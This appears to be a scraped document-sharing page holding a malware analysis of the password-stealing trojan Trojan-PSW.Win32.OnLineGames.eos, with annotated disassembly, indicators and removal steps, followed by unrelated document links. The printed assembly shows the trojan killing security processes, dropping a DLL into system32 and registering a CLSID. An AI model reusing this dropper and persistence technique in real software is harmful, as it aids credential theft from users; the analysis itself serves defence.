prev
next
out of 4

Win32OnlineGames

  • Upload
    rstsyn

  • View
    220

  • Download
    0

Embed Size (px)

Citation preview

  • 8/14/2019 Win32OnlineGames

    1/4

    .:: Trojan-PSW.Win32.OnLineGames.eos ::.

    Author: Giuseppe 'Evilcry' Bonfa'E-mail: evilcry {AT} gmail {DOT} com

    Website: http://evilcry.altervista.orgBlog: http://evilcodecave.wordpress.com

    The Essay

    Win32.OnLineGames is a PSW Trojan, which works as a Password Stealer,specifically written to steal online gaming passwords.

    00401314 add eax, esi00401316 lea eax, ds:401442h0040131C jmp eax ;00401442

    At the entry point, code flow jumps to 00401442

    00401442 push ebp00401443 mov ebp, esp00401445 sub esp, 52Ch0040144B call ds:GetCurrentThreadId00401451 push eax00401452 call ds:GetThreadDesktop00401458 test eax, eax0040145A jnz short loc_40145D0040145C int 3 ; Trap to Debugger0040145D push ebx0040145E push esi0040145F push edi00401460 mov edi, offset aCzxsderdaksiic ; "CZXSDERDAKSIICS_MX"

    00401465 xor esi, esi00401467 push edi ; String00401468 push esi ; NULL00401469 push EVENT_ALL_ACCESS0040146E call ds:OpenEventA

    Obtains the handle to the desktop associated to the executable itself and opensthe handle of an existing event called CZXSDERDAKSIICS_MX, if event exists itsown handle is closed, else a new event (called CZXSDERDAKSIICS_MX9 is createdwith Standard SecurityAttributes.

    00401486 mov [ebp-10h], eax00401489 mov edi, offset off_401154 ;Edi points to an array of strings,

    that are a list of executables0040148E mov ecx, [edi]00401490 call sub_401798 ;Check if the searched process is running00401495 cmp eax, esi00401497 jz short loc_4014B2 ; If no, go to the next process00401499 push eax0040149A push esi0040149B push 1F0FFFh004014A0 call ds:OpenProcess004014A6 cmp eax, esi004014A8 jz short loc_4014B2004014AA push esi004014AB push eax004014AC call ds:TerminateProcess004014B2 add edi, 4004014B5 cmp edi, offset dword_40115C ;Next process to search004014BB jl short loc_40148E

    http://evilcry.altervista.org/http://evilcodecave.wordpress.com/http://evilcodecave.wordpress.com/http://evilcry.altervista.org/

  • 8/14/2019 Win32OnlineGames

    2/4

    004014BD call sub_40131E ;AdjustTokenPrivilege

    The searched executables ere: Twister.exe and FilMsg.exe

    0040151B call ds:GetSystemDirectoryA00401521 mov edx, offset asc_401204 ; "\\"00401526 lea ecx, [ebp-11Ch] ;points to the System Directory0040152C call sub_40174A00401531 lea edx, [ebp-11Ch]00401537 lea ecx, [ebp-428h]0040153D call sub_40176F00401542 push esi00401543 call ds:GetModuleHandleA00401549 push offset aMndll ; "MNDLL"0040154E push 65h00401550 push eax00401551 mov [ebp+8], eax00401554 call ds:FindResourceA0040155A push eax ;004020480040155B mov [ebp-4], eax0040155E push dword ptr [ebp+8]00401561 call ds:SizeofResource00401567 push dword ptr [ebp-4]0040156A mov [ebp-18h], eax0040156D push dword ptr [ebp+8]00401570 call ds:LoadResource00401576 push eax ;0040207000401577 call ds:LockResource0040157D cmp eax, esi0040157F mov [ebp-4], eax00401582 jnz short loc_40158E00401584 push dword ptr [ebp-10h]00401587 call edi ; CloseHandle00401589 jmp loc_4016C6

    The code here is clear, after enstablishing the System Directory, searches for aResource type "MNDLL" and next loads it, the LoadResource give us an intersinglocation 00402070, that's an executable image, exploring this executable we cansee some intersing strings http://www.poptang.com/ekeyBind, ConfigAreaNamegame.ini, SOFTWARE\Wizet\MapleStory

    004015A6 add esp, 0Ch004015A9 lea edx, [ebp-428h]004015AF lea ecx, [ebp-11Ch]004015B5 call ScansFor ;call sub_40176F (searches for csavpw0.dll)004015BA lea edx, [ebp-324h] ;SystemDirectory004015C0 lea ecx, [ebp-11Ch] ;csavpw0.dll

    004015C6 call sub_40174A004015CB lea eax, [ebp-11Ch]004015D1 push eax004015D2 call ds:DeleteFileA004015D8 push esi004015D9 push 80h004015DE push 2004015E0 push esi004015E1 push esi004015E2 lea eax, [ebp-11Ch]004015E8 push 40000000h004015ED push eax004015EE call ds:CreateFileA

    004015F4 cmp eax, 0FFFFFFFFh004015F7 mov [ebp-14h], eax004015FA jnz short loc_401605004015FC inc dword ptr [ebp+8]

  • 8/14/2019 Win32OnlineGames

    3/4

    004015FF cmp dword ptr [ebp+8], 0Ah00401603 jb short loc_401591 ;Go to the next cycle

    If there is another csavpw0.dll, is firstly deleted and next recreated, ifcreation fails is performed the same routine for csavpw1.dll, csavpw2.dll.

    In my case, exists csavpw2.dll

    00401608 push esi00401609 push ecx0040160A push dword ptr [ebp-18h] ; Size: 4C000040160D push dword ptr [ebp-4] ; Buffer: 0040207000401610 push eax00401611 call ds:WriteFile0040161A call CloseHandle0040161C push ebx0040161D call ds:Sleep00401623 lea ecx, [ebp-11Ch] ;C:\WINDOWS\system32\csavpw2.dll

    csavpw2.dll is filled up with the from Malware's Resources

    00401630 push ebx00401631 lea eax, [ebp-220h]00401637 push offset aCzxsderdaksi_0 ; "CZXSDERDAKSIICS_%d"0040163C push eax0040163D call ds:wsprintfA00401643 add esp, 0Ch00401646 lea eax, [ebp-220h]0040164C push eax ;CZXSDERDAKSIICS_00040164D push esi0040164E push 1F0003h00401653 call ds:OpenEventA00401659 cmp eax, esi

    0040165B jz short loc_4016660040165D push eax0040165E call CloseHandle00401660 inc ebx00401661 cmp ebx, 0Ah00401664 jb short loc_401630

    As usual it searches for CZXSDERDAKSIICS_0, CZXSDERDAKSIICS_1, CZXSDERDAKSIICS_2when the OpenEvent FAILS we have this

    0040166C push 104h00401671 push eax00401672 push esi

    00401673 call ds:GetModuleFileNameA00401679 lea eax, [ebp-220h] ;CZXSDERDAKSIICS_20040167F lea edx, [ebp-52Ch] ;Path of our virus executable00401685 push eax ;CZXSDERDAKSIICS_200401686 lea eax, [ebp-11Ch]0040168C push eax ;C:\WINDOWS\system32\csavpw2.dll0040168D mov ecx, offset a8dfa290443ae89 ;"{8DFA2904-43AE-8929-9664-4347554D24B6}"00401692 call sub_40124E

    -> call sub_40124E Creates a RegKey in HKEY_CLASSES_ROOT with SubKey CLSID\{8DFA2904-97C43AE-8929-9664-4347554D24B6} and setted some values as"ExeModuleName", "DllModuleName", "SobjEventName"

    004016B5 push eax ; csavpw2.dll004016B6 call edi ;LoadLibraryA004016B8 push esi

  • 8/14/2019 Win32OnlineGames

    4/4

    004016B9 call ds:ExitProcess004016BF push eax004016C0 call ds:CloseHandle

    .:: Trojan Removal ::.

    1) Delete the Trojan file: csavpw0/1/2/etc.dll

    2) Delete the following CLSID CLSID\{8DFA2904-97C43AE-8929-9664-4347554D24B6}

    Regards,Giuseppe 'Evilcry' Bonfa'


Steve Jobs' Commencement Speech at Stanford

Steve Jobs' Commencement Speech at Stanford

Documents
Daniel Zanella and Alexander Weygers

Daniel Zanella and Alexander Weygers

Documents
The Last Carnival I Ever Saw

The Last Carnival I Ever Saw

Documents
Physical Modelling Synthesis Overview

Physical Modelling Synthesis Overview

Documents
xCDC14a

xCDC14a

Documents
The Best American Humorous Short Stories

The Best American Humorous Short Stories

Documents
Bodybuilding - The Rock Hard Challenge (Month 1 Training)

Bodybuilding - The Rock Hard Challenge (Month 1 Training)

Documents
Fortran

Fortran

Documents
Basic Buffer Overflows Explained

Basic Buffer Overflows Explained

Documents
Cakes Recipes

Cakes Recipes

Documents
(Tesla) - The Tesla Magnetic Car Engine

(Tesla) - The Tesla Magnetic Car Engine

Documents
Star Wars Prequel Trilogy Trivia (Episodes I-III)

Star Wars Prequel Trilogy Trivia (Episodes I-III)

Documents
Explore The Levels of Creation

Explore The Levels of Creation

Documents
Chapter 24

Chapter 24

Documents
Simple Functions in Haskell

Simple Functions in Haskell

Documents
Minne hävisivät soneran rahat

Minne hävisivät soneran rahat

Documents
Who Killed God

Who Killed God

Documents
How Computer Keyboards Work

How Computer Keyboards Work

Documents
Introduction to Six Sigma

Introduction to Six Sigma

Documents
Improve the Color Quality Of Your Monitor

Improve the Color Quality Of Your Monitor

Documents
Barclays1

Barclays1

Documents
United States Constitution

United States Constitution

Documents
Star Wars Original Trilogy Trivia (Episodes IV-VI)

Star Wars Original Trilogy Trivia (Episodes IV-VI)

Documents
Heidegger Kritik

Heidegger Kritik

Documents
Do you admire Leonardo da Vinci?

Do you admire Leonardo da Vinci?

Documents
Aesops Fables

Aesops Fables

Documents
Oedipus The King: The Ideal Tragic Play

Oedipus The King: The Ideal Tragic Play

Documents
Algorithms

Algorithms

Documents
Jan Van Eyck and the Man In A Red Turban

Jan Van Eyck and the Man In A Red Turban

Documents
Star Wars Trivia!

Star Wars Trivia!

Documents